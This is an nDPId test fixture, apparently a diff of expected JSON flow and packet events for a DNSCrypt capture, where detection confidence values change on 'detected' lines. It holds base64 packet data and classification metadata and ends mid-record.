01143{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":323,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":127,"flow_packet_id":1,"flow_last_seen":946739317496,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":554,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":554,"pkt_l4_len":520,"thread_ts_msec":946739317496,"pkt":"REREREREZmZmZmZmCABFAAIcbsxAAL0R7dwKAAABLUxxH6jYAbsCCGFBZBkBAAABAAAAAAABATINZG5zY3J5cHQtY2VydANkbnMEc2VieQJpbwAAEAABAAAAAAAAAAAAAcgADAHEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA="} -00658{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":323,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":127,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739317496,"flow_last_seen":946739317496,"flow_idle_time":200000,"flow_min_l4_payload_len":512,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":512,"flow_avg_l4_payload_len":512,"midstream":0,"thread_ts_msec":946739317496,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"45.76.113.31","src_port":43224,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} +00658{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":323,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":127,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739317496,"flow_last_seen":946739317496,"flow_idle_time":200000,"flow_min_l4_payload_len":512,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":512,"flow_avg_l4_payload_len":512,"midstream":0,"thread_ts_msec":946739317496,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"45.76.113.31","src_port":43224,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} 00605{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":324,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":128,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739317496,"flow_last_seen":946739317496,"flow_idle_time":200000,"flow_min_l4_payload_len":1472,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1472,"flow_avg_l4_payload_len":1472,"midstream":0,"thread_ts_msec":946739317496,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"45.76.113.31","src_port":55267,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 02426{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":324,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":128,"flow_packet_id":1,"flow_last_seen":946739317496,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":1514,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1514,"pkt_l4_len":1480,"thread_ts_msec":946739317496,"pkt":"REREREREZmZmZmZmCABFAAXcbs0gAL0RChwKAAABLUxxH9fjAbsGBNdkZBYBAAABAAAAAAABATINZG5zY3J5cHQtY2VydANkbnMEc2VieQJpbwAAEAABAAAAAAAAAAAABcQADAXAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA="} -00662{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":324,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":128,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739317496,"flow_last_seen":946739317496,"flow_idle_time":200000,"flow_min_l4_payload_len":1472,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1472,"flow_avg_l4_payload_len":1472,"midstream":0,"thread_ts_msec":946739317496,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"45.76.113.31","src_port":55267,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} +00662{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":324,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":128,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739317496,"flow_last_seen":946739317496,"flow_idle_time":200000,"flow_min_l4_payload_len":1472,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1472,"flow_avg_l4_payload_len":1472,"midstream":0,"thread_ts_msec":946739317496,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"45.76.113.31","src_port":55267,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} 00225{"error_event_id":9,"error_event_name":"nDPI IPv4\/L4 payload detection failed","datalink":1,"packet_id":325,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","l4_data_len":60,"global_ts_msec":946739317496} 00420{"packet_event_id":1,"packet_event_name":"packet","packet_id":325,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":94,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":94,"pkt_l4_len":0,"thread_ts_msec":946739317496,"pkt":"REREREREZmZmZmZmCABFAABQbs0Aub0RLu8KAAABLUxxHwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA=="} 00601{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":326,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":129,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739317496,"flow_last_seen":946739317496,"flow_idle_time":200000,"flow_min_l4_payload_len":512,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":512,"flow_avg_l4_payload_len":512,"midstream":0,"thread_ts_msec":946739317496,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"45.76.113.31","src_port":51589,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 01143{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":326,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":129,"flow_packet_id":1,"flow_last_seen":946739317496,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":554,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":554,"pkt_l4_len":520,"thread_ts_msec":946739317496,"pkt":"REREREREZmZmZmZmCABFAAIcbs5AAL0R7doKAAABLUxxH8mFAbsCCGFBZBcBAAABAAAAAAABATINZG5zY3J5cHQtY2VydANkbnMEc2VieQJpbwAAEAABAAAAAAAAAAAAAcgADAHEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA="} -00658{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":326,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":129,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739317496,"flow_last_seen":946739317496,"flow_idle_time":200000,"flow_min_l4_payload_len":512,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":512,"flow_avg_l4_payload_len":512,"midstream":0,"thread_ts_msec":946739317496,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"45.76.113.31","src_port":51589,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} +00658{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":326,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":129,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739317496,"flow_last_seen":946739317496,"flow_idle_time":200000,"flow_min_l4_payload_len":512,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":512,"flow_avg_l4_payload_len":512,"midstream":0,"thread_ts_msec":946739317496,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"45.76.113.31","src_port":51589,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} 00601{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":327,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":130,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739317496,"flow_last_seen":946739317496,"flow_idle_time":200000,"flow_min_l4_payload_len":512,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":512,"flow_avg_l4_payload_len":512,"midstream":0,"thread_ts_msec":946739317496,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"45.76.113.31","src_port":43776,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 01143{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":327,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":130,"flow_packet_id":1,"flow_last_seen":946739317496,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":554,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":554,"pkt_l4_len":520,"thread_ts_msec":946739317496,"pkt":"REREREREZmZmZmZmCABFAAIcbs9AAL0R7dkKAAABLUxxH6sAAbsCCGFBZBUBAAABAAAAAAABATINZG5zY3J5cHQtY2VydANkbnMEc2VieQJpbwAAEAABAAAAAAAAAAAAAcgADAHEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA="} -00658{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":327,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":130,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739317496,"flow_last_seen":946739317496,"flow_idle_time":200000,"flow_min_l4_payload_len":512,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":512,"flow_avg_l4_payload_len":512,"midstream":0,"thread_ts_msec":946739317496,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"45.76.113.31","src_port":43776,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} +00658{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":327,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":130,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739317496,"flow_last_seen":946739317496,"flow_idle_time":200000,"flow_min_l4_payload_len":512,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":512,"flow_avg_l4_payload_len":512,"midstream":0,"thread_ts_msec":946739317496,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"45.76.113.31","src_port":43776,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} 00605{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":328,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":131,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739317496,"flow_last_seen":946739317496,"flow_idle_time":200000,"flow_min_l4_payload_len":1472,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1472,"flow_avg_l4_payload_len":1472,"midstream":0,"thread_ts_msec":946739317496,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"45.76.113.31","src_port":59707,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 02426{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":328,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":131,"flow_packet_id":1,"flow_last_seen":946739317496,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":1514,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1514,"pkt_l4_len":1480,"thread_ts_msec":946739317496,"pkt":"REREREREZmZmZmZmCABFAAXcbtAgAL0RChkKAAABLUxxH+k7AbsGBMYOZBQBAAABAAAAAAABATINZG5zY3J5cHQtY2VydANkbnMEc2VieQJpbwAAEAABAAAAAAAAAAAABcQADAXAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA="} -00662{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":328,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":131,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739317496,"flow_last_seen":946739317496,"flow_idle_time":200000,"flow_min_l4_payload_len":1472,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1472,"flow_avg_l4_payload_len":1472,"midstream":0,"thread_ts_msec":946739317496,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"45.76.113.31","src_port":59707,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} +00662{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":328,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":131,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739317496,"flow_last_seen":946739317496,"flow_idle_time":200000,"flow_min_l4_payload_len":1472,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1472,"flow_avg_l4_payload_len":1472,"midstream":0,"thread_ts_msec":946739317496,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"45.76.113.31","src_port":59707,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} 00605{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":329,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":132,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739317496,"flow_last_seen":946739317496,"flow_idle_time":200000,"flow_min_l4_payload_len":1472,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1472,"flow_avg_l4_payload_len":1472,"midstream":0,"thread_ts_msec":946739317496,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"45.76.113.31","src_port":52069,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 02426{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":329,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":132,"flow_packet_id":1,"flow_last_seen":946739317496,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":1514,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1514,"pkt_l4_len":1480,"thread_ts_msec":946739317496,"pkt":"REREREREZmZmZmZmCABFAAXcbtEgAL0RChgKAAABLUxxH8tlAbsGBOPgZBgBAAABAAAAAAABATINZG5zY3J5cHQtY2VydANkbnMEc2VieQJpbwAAEAABAAAAAAAAAAAABcQADAXAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA